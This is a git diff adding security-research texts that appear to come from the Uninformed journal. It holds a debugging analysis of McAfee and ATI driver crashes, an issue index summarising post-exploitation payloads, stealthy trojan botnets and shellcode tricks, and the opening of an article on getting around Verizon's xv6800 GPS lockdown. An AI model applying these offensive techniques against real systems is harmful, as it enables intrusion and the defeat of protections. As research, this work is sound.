perform +a certain task rather than making their code to be more robust. + +In the interest of helping to make code more robust, this document +will provide two examples of widely used software that make +assumptions about the way in which code will execute on a given +machine. The assumptions these applications make are always safe +under normal conditions. However, if a new application that +performs a certain task or an undocumented change is thrown into the +mix, the applications find themselves faltering in the most +unenjoyable ways. The two applications that will be analyzed are +listed below: + + - McAfee VirusScan Consumer (8.0/9.0) + - ATI Radeon 9000 Driver Series + +Each of the assumptions that these two software products make will +be analyzed in-depth to describe why it is that they are poor +assumptions to make, such as by describing or illustrating +conditions where the assumptions are, or could be, false. From +there, suggestions will be made on how these assumptions might be +worked around or fixed to allow for a more stable product in +general. In the end, the reader should have a clear understanding of +the assumptions described in this document. If successful, the +author hopes the topic will allow the reader to think critically +about the various assumptions the reader might make when +implementing software. + + +2) McAfee VirusScan Consumer (8.0/9.0) + + +2.1) The Assumption + +McAfee VirusScan Consumer 8.0, 9.0, and possibly previous versions +make assumptions about processes not performing certain types of +file operations during a critical phase of process initialization. +If file operations are performed during this phase, the machine may +blue screen due to an invalid pointer access. + + +2.2) The Problem + +The critical phase of process execution that the summary refers to is the +period between the time that the new process object instance is created by +nt!ObCreateObject and the time the new process object is inserted into the +process object type list by nt!ObInsertObject. The reason this phase is so +critical is because it is not safe for things to attempt to obtain a handle to +the process object, such as can be done by calling nt!ObOpenObjectByPointer. +If an application were to attempt to obtain a handle to the process object +before it had been inserted into the process object list by nt!ObInsertObject, +critical creation state information that is stored in the process object's +header would be overwritten with state information that is meant to be used +after the process has passed the initial security validation phase that is +handled by nt!ObInsertObject. In some cases, overwriting the creation state +information prior to calling nt!ObInsertObject can lead to invalid pointer +references when nt!ObInsertObject is eventually called, thus leading to an evil +blue screen that some users are all too familiar with. + +To better understand this problem it is first necessary to understand the way +in which nt!PspCreateProcess creates and initializes the process object and the +process handle that is passed back to callers. The object creation portion is +accomplished by making a call to nt!ObCreateObject in the following fashion: + +ObCreateObject( + KeGetPreviousMode(), + PsProcessType, + ObjectAttributes, + KeGetPreviousMode(), + 0, + 0x258, + 0, + 0, + &ProcessObject); + +If the call is successful, a process object of the supplied size is created and +initialized using the attributes supplied by the caller. In this case, the +object is created using the nt!PsProcessType object type. The size argument +that is supplied to nt!ObCreateObject, which in this case is 0x258, will vary +between various versions of Windows as new fields are added and removed from +the opaque EPROCESS structure. The process object's instance, as with all +objects, is prefixed with an OBJECT_HEADER that may or may not also be prefixed +with optional object information. For reference, the OBJECT_HEADER structure is +defined as follows: + +OBJECT_HEADER: + +0x000 PointerCount : Int4B + +0x004 HandleCount : Int4B + +0x004 NextToFree : Ptr32 Void + +0x008 Type : Ptr32 _OBJECT_TYPE + +0x00c NameInfoOffset : UChar + +0x00d HandleInfoOffset : UChar + +0x00e QuotaInfoOffset : UChar + +0x00f Flags : UChar + +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION + +0x010 QuotaBlockCharged : Ptr32 Void + +0x014 SecurityDescriptor : Ptr32 Void + +0x018 Body : _QUAD + +When an object is first returned from nt!ObCreateObject, the Flags attribute +will indicate if the ObjectCreateInfo attribute is pointing to valid data by +having the OB_FLAG_CREATE_INFO, or 0x1 bit, set. If the flag is set then the +ObjectCreateInfo attribute will point to an OBJECT_CREATE_INFORMATION structure +which has the following definition: + +OBJECT_CREATE_INFORMATION: + +0x000 Attributes : Uint4B + +0x004 RootDirectory : Ptr32 Void + +0x008 ParseContext : Ptr32 Void + +0x00c ProbeMode : Char + +0x010 PagedPoolCharge : Uint4B + +0x014 NonPagedPoolCharge : Uint4B + +0x018 SecurityDescriptorCharge : Uint4B + +0x01c SecurityDescriptor : Ptr32 Void + +0x020 SecurityQos : Ptr32 _SECURITY_QUALITY_OF_SERVICE + +0x024 SecurityQualityOfService : _SECURITY_QUALITY_OF_SERVICE + +When nt!ObInsertObject is finally called, it is assumed that the object still +has the OB_FLAG_CREATE_INFO bit set. This will always be the case unless something +has caused the bit to be cleared, as will be illustrated later in this chapter. +The flow of execution within nt!ObInsertObject begins first by checking to see +if the process' object header has any name information, which is conveyed by +the NameInfoOffset of the OBJECT_HEADER. Regardless of whether or not the +object has name information, the next step taken is to check to see if the +object type that is associated with the object that is supplied to +nt!ObInsertObject requires a security check to be performed. This requirement +is conveyed through the TypeInfo attribute of the OBJECT_TYPE structure which is +defined below: + +OBJECT_TYPE: + +0x000 Mutex : _ERESOURCE + +0x038 TypeList : _LIST_ENTRY + +0x040 Name : _UNICODE_STRING + +0x048 DefaultObject : Ptr32 Void + +0x04c Index : Uint4B + +0x050 TotalNumberOfObjects : Uint4B + +0x054 TotalNumberOfHandles : Uint4B + +0x058 HighWaterNumberOfObjects : Uint4B + +0x05c HighWaterNumberOfHandles : Uint4B + +0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER + +0x0ac Key : Uint4B + +0x0b0 ObjectLocks : [4] _ERESOURCE + +OBJECT_TYPE_INITIALIZER: + +0x000 Length : Uint2B + +0x002 UseDefaultObject : UChar + +0x003 CaseInsensitive : UChar + +0x004 InvalidAttributes : Uint4B + +0x008 GenericMapping : _GENERIC_MAPPING + +0x018 ValidAccessMask : Uint4B + +0x01c SecurityRequired : UChar + +0x01d MaintainHandleCount : UChar + +0x01e MaintainTypeList : UChar + +0x020 PoolType : _POOL_TYPE + +0x024 DefaultPagedPoolCharge : Uint4B + +0x028 DefaultNonPagedPoolCharge : Uint4B + +0x02c DumpProcedure : Ptr32 + +0x030 OpenProcedure : Ptr32 + +0x034 CloseProcedure : Ptr32 + +0x038 DeleteProcedure : Ptr32 + +0x03c ParseProcedure : Ptr32 + +0x040 SecurityProcedure : Ptr32 + +0x044 QueryNameProcedure : Ptr32 + +0x048 OkayToCloseProcedure : Ptr32 + +The specific boolean field that is checked by nt!ObInsertObject is the +TypeInfo.SecurityRequired flag. If the flag is set to TRUE, which it is for +the nt!PsProcessType object type, then nt!ObInsertObject uses the access state +that is passed in as the second argument or creates a temporary access state +that it uses to validate the access mask that is supplied as the third argument +to nt!ObInsertObject. Prior to validating the access state, however, the +SecurityDescriptor attribute of the ACCESS_STATE structure is set to the +SecurityDescriptor of the OBJECT_CREATE_INFORMATION structure. This is done +without any checks to ensure that the OB_FLAG_CREATE_INFO flag is still set in the +object's header, thus making it potentially dangerous if the flag has been +cleared and the union'd attribute no longer points to creation information. + +In order to validate the access mask, nt!ObInsertObject calls into +nt!ObpValidateAccessMask with the initialized ACCESS_STATE as the only argument. +This function first checks to see if the ACCESS_STATE's SecurityDescriptor +attribute is set to NULL. If it's not, then the function checks to see if the +SecurityDescriptor's Control attribute has a flag set. It is at this point +that the problem is realized under conditions where the object's +ObjectCreateInfo attribute no longer points to creation information. When such +a condition occurs, the SecurityDescriptor attribute that is referenced +relative to the ObjectCreateInfo attribute will potentially point to invalid +memory. This can then lead to an access violation when attempting to reference +the SecurityDescriptor that is passed as part of the ACCESS_STATE instance to +nt!ObpValidateAccessMask. For reference, the ACCESS_STATE structure is defined +below: + +ACCESS_STATE: + +0x000 OperationID : _LUID + +0x008 SecurityEvaluated : UChar + +0x009 GenerateAudit : UChar + +0x00a GenerateOnClose : UChar + +0x00b PrivilegesAllocated : UChar + +0x00c Flags : Uint4B + +0x010 RemainingDesiredAccess : Uint4B + +0x014 PreviouslyGrantedAccess : Uint4B + +0x018 OriginalDesiredAccess : Uint4B + +0x01c SubjectSecurityContext : _SECURITY_SUBJECT_CONTEXT + +0x02c SecurityDescriptor : Ptr32 Void + +0x030 AuxData : Ptr32 Void + +0x034 Privileges : __unnamed + +0x060 AuditPrivileges : UChar + +0x064 ObjectName : _UNICODE_STRING + +0x06c ObjectTypeName : _UNICODE_STRING + +Under normal conditions, nt!ObInsertObject is the first routine to create a +handle to the newly created object instance. When the handle is created, the +creation information that was initialized during the instantiation of the +object is used for such things as validating access, as described above. Once +the creation information is used it is discarded and replaced with other +information that is specific to the type of the object being inserted. In the +case of process objects, the Flags attribute has the OB_FLAG_CREATE_INFO bit +cleared and the QuotaBlockCharged attribute, which is union'd with the +ObjectCreateInfo attribute, is set to an instance of an EPROCESS_QUOTA_BLOCK +which is defined below: + +EPROCESS_QUOTA_ENTRY: + +0x000 Usage : Uint4B + +0x004 Limit : Uint4B + +0x008 Peak : Uint4B + +0x00c Return : Uint4B + +EPROCESS_QUOTA_BLOCK: + +0x000 QuotaEntry : [3] _EPROCESS_QUOTA_ENTRY + +0x030 QuotaList : _LIST_ENTRY + +0x038 ReferenceCount : Uint4B + +0x03c ProcessCount : Uint4B + +The assumptions made by nt!ObInsertObject work flawlessly so long as it is the +first routine to create a handle to the object instance. Fortunately, under +normal circumstances, nt!ObInsertObject is always the first routine to create a +handle to the object. Unfortunately for McAfee, however, they assume that they +can safely attempt to obtain a handle to a process object without first +checking to see what state of execution the process is in, such as by checking +to see if the OB_FLAG_CREATE_INFO flag is set in the object's header. By +attempting to obtain a handle to the process object before it is inserted by +nt!ObInsertObject, McAfee effectively destroys state that is needed by +nt!ObInsertObject to succeed. + +To show this problem being experienced in the real world, the following +debugger output shows McAfee first attempting to obtain a handle to the process +object which is then followed shortly thereafter by nt!ObInsertObject +attempting to validate the object's access mask with a bogus SecurityDescriptor +which, in turn, results in an unrecoverable access violation: + +McAfee attempting to open a handle to the process object before +nt!ObInsertObject has been called: + +kd> k +nt!ObpChargeQuotaForObject+0x2f +nt!ObpIncrementHandleCount+0x70 +nt!ObpCreateHandle+0x17c +nt!ObOpenObjectByPointer+0x97 +WARNING: Stack unwind information not available. +NaiFiltr+0x2e45 +NaiFiltr+0x3bb2 +NaiFiltr+0x4217 +nt!ObpLookupObjectName+0x56a +nt!ObOpenObjectByName+0xe9 +nt!IopCreateFile+0x407 +nt!IoCreateFile+0x36 +nt!NtOpenFile+0x25 +nt!KiSystemService+0xc4 +nt!ZwOpenFile+0x11 +0x80a367b5 +nt!PspCreateProcess+0x326 +nt!NtCreateProcessEx+0x7e +nt!KiSystemService+0xc4 + +After which point nt!ObInsertObject attempts to validate the +object's access mask using an invalid SecurityDescriptor: + +kd> k +nt!ObpValidateAccessMask+0xb +nt!ObInsertObject+0x1c2 +nt!PspCreateProcess+0x5dc +nt!NtCreateProcessEx+0x7e +nt!KiSystemService+0xc4 +kd> r +eax=fa7bbb54 ebx=ffa9fc60 ecx=00023994 +edx=00000000 esi=00000000 edi=ffb83f00 +eip=8057828e esp=fa7bbb40 ebp=fa7bbbb8 +iopl=0 nv up ei pl nz na pe nc +cs=0008 ss=0010 ds=0023 es=0023 +fs=0030 gs=0000 efl=00000202 +nt!ObpValidateAccessMask+0xb: +8057828e f6410210 + test byte ptr [ecx+0x2],0x10 ds:0023:00023996=?? + +The method by which this issue was located was by setting a breakpoint on the +instruction after the call to nt!ObCreateObject in nt!PspCreateProcess. Once +hit, a memory access breakpoint was set on the Flags attribute of the object's +header that would break whenever the field was written to. This, in turn, lead +to the tracking down of the fact that McAfee was acquiring a handle to the +process object prior to nt!ObInsertObject being called, which in turn lead to +the OB_FLAG_CREATE_INFO flag being cleared and the ObjectCreateInfo attribute +being invalidated. + + +2.3) The Solution + +There are two ways that have been identified that could correct this issue. +The first, and most plausible, would be for McAfee to modify their driver such +that it will refuse to acquire a handle to a process object if the +OB_FLAG_CREATE_INFO bit is set in the process' object header Flags attribute. The +downside to using this approach is that it requires McAfee to make use of +undocumented structures that are intended by Microsoft to be opaque, and for +good reason. However, the author is not currently aware of another means by +which an object's creation state can be detected using general purpose API +routines. + +The second approach, and it's one that should at least result in a bugcheck +within nt!ObInsertObject, would be to check to see if the object's +OB_FLAG_CREATE_INFO bit has been cleared. If it has, an alternate action can be +taken to validate the object's access mask. If it hasn't, the current method +of validating the access mask can be used. At this point in time, the author +cannot currently speak on what the alternate action would be, though it seems +plausible that there would be another means by which a synonymous action could +be performed without relying on the creation information in the object header. + +In the event that neither of these solutions are pursued, it will continue to +be necessary for protagonistic developers to avoid performing actions between +nt!ObCreateObject and nt!ObInsertObject that might result in file operations +being performed from within the new process' context. One of a number of +work-arounds to this problem would be to post file operations off to a system +worker thread that would then inherently run within the context of the System +process rather than the new process. + + +3) ATI Radeon 9000 Driver Series + + +3.1) The Assumption + +The ATI Radeon 9000 Driver Series, and likely other ATI driver series, makes +assumptions about the location that the RTL_USER_PROCESS_PARAMETERS structure will +be mapped at in the address space of a process that attempts to do 3D +operations. If the structure is not mapped at the address that is expected, +the machine may blue screen depending on the values that exist at the memory +location, if any. + + +3.2) The Problem + +During some experimentation with changing the default address space layout of +processes on NT-based versions of Windows, it was noticed that machines that +were using the ATI Radeon 9000 series drivers would crash if a process +attempted to do 3D operations and the location of the process' parameter +information was changed from the address at which it is normally mapped at. +Before proceeding, it is first necessary for the reader to understand the +purpose of the process parameter information structure and how it is that it's +mapped into the process' address space. + +Most programmers are familiar with the API routine kernel32!CreateProcess[A/W]. +This routine serves as the primary means by which user-mode applications spawn +new processes. The function itself is robust enough to support a number of +ways in which a new process can be initialized and then executed. Behind the +scenes, CreateProcess performs all of the necessary operations to prepare the +new task for execution. These options include opening the executable image +file and creating a section object that is then passed to +ntdll!NtCreateProcessEx which returns a unique process handle on success. If a +handle is obtained, CreateProcess then proceeds to prepare the process for +execution by initializing the process' parameters as well as creating and +initializing the first thread in the process. A more complete analysis of the +way in which CreateProcess operates can be found in David Probert's excellent +analysis of Windows NT's process architecture. + +For the purpose of this document, however, the part that is of most concern is +that step in which CreateProcess initializes the new process' parameters. This +is accomplished by making a call into kernel32!BasePushProcessParameters which +in turn calls into ntdll!RtlCreateProcessParameters. The parameters are +initialized within the process that is calling CreateProcess and are then, in +turn, copied into the address space of the new process by first allocating +storage with ntdll!NtAllocateVirtualMemory and then by copying the memory from +the parent process to the child with ntdll!NtWriteVirtualMemory. Due to the +fact that this occurs before the new process actually executes any code, the +address that the process parameter structure is allocated at is almost +guaranteed to be at the same address. This address happens to be 0x00020000. +This fact is most likely why ATI made the assumption that the process parameter +information would always be at a static address. + +If, however, ntdll!NtAllocateVirtualMemory allocates the process parameter +storage at any place other than the static address described above, ATI's +driver will attempt to reference a potentially invalid address when it comes +time to perform 3D operations. The specific portion of the driver suite that +has the error is the ATI3DUAG.DLL kernel-mode graphics driver. Inside this +image there is a portion of code that attempts to make reference to the +addresses 0x00020038 and 0x0002003C without doing any sort of probing and +locking or validation on the region it's requesting. If the region does not +exist or contains unexpected data, a blue screen is a sure thing. The actual +portion of the driver that makes this assumption can be found below: + +mov [ebp+var_4], eax +mov edx, 20000h <-- +mov [ebp+var_24], edx +movzx ecx, word ptr ds:dword_20035+3 <-- +shr ecx, 1 +mov [ebp+var_28], ecx +lea eax, [ecx-1] +mov [ebp+var_1C], eax +test eax, eax +jbe short loc_227CC +mov ebx, [edx+3Ch] <-- +cmp word ptr [ebx+eax*2], '\' + +The lines of intereste are marked by ``<--'' indicators pointing to the exact +instructions that result in a reference being made to an address that is +expected to be within a process' parameter information structure. For the sake +of investigation, one might wonder what it is that the driver could be +attempting to reference. To determine that, it is first necessary to dump the +format of the process parameter structure which, as stated previously, is +RTL_USER_PROCESS_PARAMETERS: + +RTL_USER_PROCESS_PARAMETERS: + +0x000 MaximumLength : Uint4B + +0x004 Length : Uint4B + +0x008 Flags : Uint4B + +0x00c DebugFlags : Uint4B + +0x010 ConsoleHandle : Ptr32 Void + +0x014 ConsoleFlags : Uint4B + +0x018 StandardInput : Ptr32 Void + +0x01c StandardOutput : Ptr32 Void + +0x020 StandardError : Ptr32 Void + +0x024 CurrentDirectory : _CURDIR + +0x030 DllPath : _UNICODE_STRING + +0x038 ImagePathName : _UNICODE_STRING + +0x040 CommandLine : _UNICODE_STRING + +0x048 Environment : Ptr32 Void + +0x04c StartingX : Uint4B + +0x050 StartingY : Uint4B + +0x054 CountX : Uint4B + +0x058 CountY : Uint4B + +0x05c CountCharsX : Uint4B + +0x060 CountCharsY : Uint4B + +0x064 FillAttribute : Uint4B + +0x068 WindowFlags : Uint4B + +0x06c ShowWindowFlags : Uint4B + +0x070 WindowTitle : _UNICODE_STRING + +0x078 DesktopInfo : _UNICODE_STRING + +0x080 ShellInfo : _UNICODE_STRING + +0x088 RuntimeData : _UNICODE_STRING + +0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR + +To determine the attribute that the driver is attempting to reference, one must +take the addresses and subtract them from the base address 0x00020000. This +produces two offsets: 0x38 and 0x3c. Both of these offsets are within the +ImagePathName attribute which is a UNICODE_STRING. The UNICODE_STRING structure +is defined as: + +UNICODE_STRING: + +0x000 Length : Uint2B + +0x002 MaximumLength : Uint2B + +0x004 Buffer : Ptr32 Uint2B + +This would mean that the driver is attempting to reference the path name of the +process' executable image. The 0x38 offset is the length of the image path +name and the 0x3c is the pointer to the image path name buffer that actually +contains the path. The reason that the driver would need to get access to the +executable path is outside of the scope of this discussion, but suffice to say +that the method on which it is based is an assumption that may not always be +safe to make, especially under conditions where the process' parameter +information is not mapped at 0x00020000. + + +3.3) The Solution + +The solution to this problem would be for ATI to come up with an alternate +means by which the process' image path name can be obtained. Possibilities for +alternate methods include referencing the PEB to obtain the address of the +process parameters (by using the ProcessParameters attribute of the PEB). This +approach is suboptimal because it requires that ATI attempt to reference fields +in a structure that is intended to be opaque and also readily changes between +versions of Windows. Another alternate approach, which is perhaps the most +feasible, would be to make use of the ProcessImageFileName PROCESSINFOCLASS. +This information class can be queried using the NtQueryInformationProcess +system call to populate a UNICODE_STRING that contains the full path to the +image that is associated with the handle that is supplied to +NtQueryInformationProcess. The nice thing about this is that it actually +indirectly uses the alternate method from the first proposal, but it does so +internally rather than forcing an external vendor to access fields of the PEB. + +Regardless of the actual solution, it seems obvious that assuming that a region +of memory will be mapped at a fixed address in every process is something that +ATI should not do. There are indeed cases where Windows itself requires +certain things to be mapped at the same address between one execution of a +process to the next, but it is the opinion of the author that ATI should not +assume things that Windows itself does not also assume. + + +4) Conclusion + +Though this document may appear as an attempt to make specific 3rd party +vendors look bad, that is not its intention. In fact, the author acknowledges +having been an antagonistic developer in the past. To that point, the author +hopes that by providing specific illustrations of where assumptions made by 3rd +parties can lead to problems, the reader will be more apt to consider potential +conditions that might become problematic if other applications attempt to +co-exist with ones that the reader may write in the future. + + +Bibliography + +Probert, David B. Windows Kernel Internals: Process Architecture. +http://www.i.u-tokyo.ac.jp/ss/lecture/new-documents/Lectures/13-Processes/Processes.ppt; +accessed April 04, 2005. diff --git a/uninformed/1.txt b/uninformed/1.txt new file mode 100644 index 0000000..57102cf --- /dev/null +++ b/uninformed/1.txt @@ -0,0 +1,43 @@ + + +Engineering in Reverse +Introduction to Reverse Engineering Win32 Applications +trew +During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of Windows Debugger (WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and demonstrate the functionality provided by WinDBG and how this functionality can be harnessed to aid the reader in reverse engineering native Win32 applications. Topics covered include an introductory look at IA-32 assembly, register significance, memory protection, stack usage, various WinDBG commands, call stacks, endianness, and portions of the Windows API. Knowledge gleaned will be used to develop an application designed to reveal and/or remove bombs from the WinMine playing grid. +code.tgz | pdf | html | txt + +Exploitation Technology +Post-Exploitation on Windows using ActiveX Controls +skape +When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS. +pdf | html | txt + +General Research +Smart Parking Meters +h1kari +Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card. +html | txt + +General Security +Loop Detection +Peter Silberman +During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and a case study will be given to illustrate its uses. All of the implementations provided in this document have been written in C/C++ using Interactive Disassembler (IDA) plug-ins. +code.tgz | pdf | html | txt + +Social Zombies: Aspects of Trojan Networks +warlord +Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft of money and confidential data as well as extortion, spam, and a whole plethora of further ways. Most often the infected hosts are linked into simple botnets to provide an easy way for the botnet manager to command his zombie army. This article describes ways to form far more effective networks than the ones in use today by the means of stealth, deception, and cryptography. +pdf | html | txt + +Machine Speak +Mac OS X PPC Shellcode Tricks +H D Moore +Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction caches of the PowerPC processor can cause a variety of problems with exploit and shellcode development. The common practice of patching opcodes at run-time is much more involved when the instruction cache is in incoherent mode. NULL-free shellcode can be improved by taking advantage of index registers and the reserved bits found in many opcodes, saving space otherwise taken by standard NULL evasion techniques. The Mac OS X operating system introduces a few challenges to unsuspecting developers; system calls change their return address based on whether they succeed and oddities in the Darwin kernel can prevent standard execve() shellcode from working properly with a threaded process. The virtual memory layout on Mac OS X can be abused to overcome instruction cache obstacles and develop even smaller shellcode. +pdf | html | txt + +What Were They Thinking? +Annoyances Caused by Unsafe Assumptions +skape +This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems. +pdf | html | txt + diff --git a/uninformed/10.1.txt b/uninformed/10.1.txt new file mode 100644 index 0000000..315c77c --- /dev/null +++ b/uninformed/10.1.txt @@ -0,0 +1,929 @@ +Can you find me now? - Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS +10/2008 +Skywing +skywing_uninformed@valhallalegends.com + +0. Abstract + +In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 +(rebranded HTC Titan) line of Windows Mobile smartphones that provided a number +of new features previously unavailable on the device on the initial release +firmware. In particular, support for accessing the device's built-in Qualcomm +gpsOne assisted GPS chipset was introduced with this update. However, Verizon +Wireless elected to attempt to lock down the GPS hardware on xv6800 such that +only applications authorized by Verizon Wireless would be able to access the +device's built-in GPS hardware and perform location-based functions (such as +GPS-assisted navigation). The mechanism used to lock down the GPS hardware is +entirely client-side based, however, and as such suffers from fundamental +limitations in terms of how effective the lockdown can be in the face of an +almost fully user-programmable Windows Mobile-based device. This article +outlines the basic philosophy used to prevent unauthorized applications from +accessing the GPS hardware and provides a discussion of several of the flaws +inherent in the chosen design of the protection mechanism. In addition, +several pitfalls relating to debugging and reverse engineering programs on +Windows Mobile are also discussed. Finally, an overview of several suggested +design alterations that would have mitigated some of the flaws in the current +GPS lock down system from the perspective of safeguarding the privacy of user +location data are also presented. + +1. Introduction + +The Verizon Wireless xv6800 (which is in and of itself a rebranded version of +the HTC Titan, with a carrier-customized firmware loadout) is a recently +released Windows Mobile-based smartphone. A firmware update released during +August 2008 enabled several new features on the device. For the purposes of +this article, the author has elected to focus on the embedded Qualcomm gpsOne +chipset, which provides assisted GPS facilities to applications running on the +device. + +With the official firmware upgrade (known as MR1), the assisted GPS support on +the device, which had previously remained inaccessible when using carrier- +supported firmware, was activated, albeit with a catch; only applications that +were approved by Verizon Wireless were able to access the built-in GPS hardware +present on the device. Although third-party applications could access an +externally connected (for example, Bluetooth-enabled) GPS device, the Qualcomm +gpsOne chipset embedded in the phone itself remained inaccessible. Coinciding +with the public release of the xv6800 MR1 firmware, Verizon Wireless also began +making available a subscription-based application (called "VZ Navigator"), +which provides voice-based turn-by-turn navigation on the xv6800 via the usage +of the device's built-in GPS hardware. + +There have been a variety of third-party firmware images released for the +xv6800 that mix-and-match portions of official firmware releases from other +carriers supporting their own rebranded versions of xv6800 (HTC Titan). Some +of these custom firmware images enable access to the gpsOne hardware, albeit +with several caveats. In particular, until recently, assisted GPS mode, wherein +the cellular network aids the device in acquiring a GPS fix, was not available +on Verizon Wireless's network with custom firmware images; only standalone GPS +mode (which requires waiting for a "cold lock" on three GPS satellites, a +process that may take many minutes after device boot) was enabled. In +addition, installing these custom firmware images requires patching out a +signature check in the software loader on the device. This procedure may be +considered dangerous if one wishes to retain hardware warranty support (which +may be desirable, given the steep unsubsidized cost of the device). + +Furthermore, should one install the official Verizon Wireless MR1 firmware +upgrade, the gpsOne hardware on the device would remain locked down even if one +switched to a currently available third-party firmware images. This +is likely due to a sticky setting written to the firmware during the carrier +provisioning process at the completion of the MR1 firmware upgrade. As the +presently available third-party ROM images do not wipe the area of the device's +firmware which seems to control the GPS hardware's lockdown state, it becomes +difficult to unlock the GPS hardware after having upgraded to the MR1 firmware +image. A lengthy process is available to undo this change, but it involves +the complete reset of most provisioning settings on the device, such that the +phone must be partially manually reprovisioned, as opposed to utilizing the +over-the-air provisioning support. + +Given the downsides of relying on custom firmware images for enabling the +built-in GPS hardware on the xv6800, the official firmware release does pose a +reasonable attraction. However, the locking down of the GPS hardware to only +Verizon Wireless authorized applications is undesirable should one wish to use +third-party location-enabled applications with the built-in GPS hardware, such +as Google Maps or Microsoft's Live Search. + +Verizon Wireless indicates that third-party application usage of the GPS +hardware on their devices is subject to Verizon Wireless-dictated policies and +procedures [1]. In particular, the security of user location information is +often cited [2] as a reason for requiring location-enabled applications to be +certified by Verizon Wireless. Unfortunately, the mechanism deployed to lock +built-in GPS hardware on the xv6800 provides very little in the way of true +security against third-party programs (malicious or otherwise) from accessing +location information. In fact, given Windows Mobile 6's lack of "hard" process +isolation, it is questionable as to whether it is even technically feasible to +provide a truly secure protection mechanism on a device that allows +user-supplied programs to be loaded and executed. + +While there may be golden intentions in attempting to protect users from +malicious programs designed to harvest their location information on-the-fly, +the protection system as implemented to control access to the gpsOne chipset +on the xv6800 is unfortunately relatively weak. This is at odds with Verizon +Wireless's stated goals of attemting to protect the security of a user's location +information, and thus may place users at risk. + +2. Overview of Protection Mechanisms + +There are multiple levels of protection mechanisms built-in to both the MR1 +firmware image for the xv6800, as well as the GPS-enabled subscription VZ +Navigator software that Verizon Wireless supports as the sole officially +sanctioned location-based application (at the time of this article's writing). +The protection mechanisms can be broken up into those that exist on the device +firmware itself, and those that exist in the VZ Navigator software. + +2.1. Firmware-based Protection Mechanisms + +The MR1 firmware provides the underlying foundation of the built-in GPS +hardware lockdown logic. There are several built-in software components that +are "baked into" the firmware image and support the GPS lockdown system. The +principle design underpinning the firmware-based protection system, however, is +a fairly run of the mill security-through-obscurity based approach. In +particular, GPS location information obtained by the built-in gpsOne hardware +(specifically, latitude and longitude) is encrypted. Only programs that +understand how to decrypt the position information are able to make sense of +any data returned by the gpsOne chipset. + +Furthermore, in order to initiate a location fix via the built-in gpsOne +hardware, an application must continually answer correctly to a series of +challenge-response interactions with the gpsOne chipset driver (and thus the +radio firmware on the device). The reason for implementing both a +challenge-response mechanism as well as obfuscating the actual GPS location +will become apparent after further discussion. + +The firmware-based protected gpsOne interface has several constituent layers, +with supporting code present at radio-firmware level, kernel driver level, and +user mode application level. + +At the lowest level, the radio firmware for the device chipset would appear to +have a hand in obfuscating returned GPS positioning data. This assumption is +logically based on a strings dump of radio firmware images indicating the +presence of AES-related calls in GPS-related code (AES is used to encrypt the +returned location information), and the fact that switching to a custom +firmware image after installing the MR1 update does not re-enable the plaintext +gpsOne interface). + +Between the radio firmware (which executes outside the context of Windows +Mobile) and the OS itself, there exists a kernel mode Windows Mobile driver +known as the GPS intermediate driver. This module (gpsid_qct.dll) provides an +interface between user mode callers and the GPS hardware on the device. It +also provides support for multiplexing a single piece of GPS hardware across +multiple user mode applications concurrently (a standard feature of Windows +Mobile's GPS support). However, Verizon Wireless has broken this support with +the locked down GPS logic that has been placed in the xv6800's implementation +of the GPS intermediate driver. + +Beneath the GPS intermediate driver, there are two different interfaces that +are supported for the collection of location data on Windows Mobile-based +devices [4]. The first of these is an emulated serial port that is exposed to +user mode, and implements a standard NMEA-compatible text-based interface for +accessing location information. This interface has also been broken by the +GPS intermediate driver used by Verizon Wireless on the xv6800, for reasons +that will become clear upon further discussion. + +The second interface for retrieving location information via the GPS +intermediate driver is a set of IOCTLs implemented by the GPS intermediate +driver to retrieve parsed (binary) GPS data from the currently-active GPS +hardware (returned as C-style structures). User mode callers do not typically +call these IOCTLs directly from their code, but instead indirect through a set +of thin C API wrappers in a system-supplied module called gpsapi.dll. This +interface is also broken by the GPS lockdown logic in the GPS intermediate +driver, although an extended version of this IOCTL-based interface is used by +GPS-enabled applications that support the locked down mode of operation on the +xv6800. + +Verizon Wireless ships a custom module parallel to gpsapi.dll on the xv6800, +named oemgpsOne.dll. This module exports a superset of the APIs provided by +the standard gpsapi.dll (although there are slight differences in function +names). Additionally, new APIs (which are, as in gpsapi.dll, simply thin +wrappers around IOCTL requests sent to the GPS intermediate driver) are +provided to manage the challenge-response and encrypted GPS location aspects +of the gpsOne lockdown system present on the xv6800. Through correct usage of +the APIs exported by oemgpsOne.dll, a program with knowledge of the GPS lock +down system can retrieve valid positioning data from the gpsOne chipset on the +device. + +Applications that are approved by Verizon Wireless for location-enabled +operation make calls to a library developed by Verizon Wireless and Autodesk, +named LBSDriver.dll, which is itself a client of oemgpsOne.dll. LBSDriver.dll +and its security measures are discussed later, along with VZ Navigator. + +2.1.a. Application Authorization via Challenge-response + +In order to activate the gpsOne hardware on the xv6800 and request a GPS +location fix, an application must receive a challenge data block from the +gpsOne driver and perform a 